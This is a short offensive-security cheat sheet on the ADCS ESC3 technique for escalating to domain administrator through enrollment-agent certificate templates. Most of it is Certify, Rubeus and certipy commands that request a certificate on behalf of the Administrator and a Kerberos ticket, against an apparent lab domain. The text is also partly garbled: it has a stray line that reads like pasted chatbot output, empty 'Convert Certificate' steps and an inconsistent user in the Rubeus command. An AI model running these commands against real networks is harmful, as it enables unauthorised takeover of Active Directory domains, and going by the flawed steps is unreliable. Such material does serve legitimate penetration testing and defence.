Skip to main content

ESC3

Unlike ESC1 and ESC2, this method requires two certificate templates with the following requirements

  • First Template
    • Certificate Request Agent EKU
  • Second Template
    • Client Authentication EKU
    • Application Policy Issuance Requirement with Authorized Signatures Required enabled and set to 1

And, of course, a user with enrollment rights.

In the context of ADCS, the Application Policy defines additional constraints that must me met for a certificate to be issued successfully from a template; having the Authorized Signatures Required attribute set to 1 (or TRUE) means that the certificate issuance process must include authorized signatures to enforce proper authorization and control over the issued certificate. Here are the modified commands with the requested changes:

Windows

Requesting a certificate

PS /home/bobbuilder> .\Certify.exe request /ca:DC.minions.com\MINIONS-DC-CA /template:<template_name>

Convert Certificate

Request a Certificate on behalf of the Administrator

PS /home/bobbuilder> .\Certify.exe request /ca:DC.minions.com\MINIONS-DC-CA /template:<template_name> /onbehalfof:minions\Administrator /enrollcert:cert.pfx

Convert Certificate

admin.pfx

Request a TGT as the Administrator

PS /home/bobbuilder> .\Rubeus.exe asktgt /user:user1@minions.com /certificate:admin.pfx /getcredentials

Linux

Requesting a certificate

bob$ certipy req -ca MINIONS-DC-CA -template <template_name> /altname:administrator@minions.com

Requesting a certificate on behalf of the Administrator account

bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca MINIONS-DC-CA -template <template_name> -on-behalf-of 'minions\administrator' -pfx user1.pfx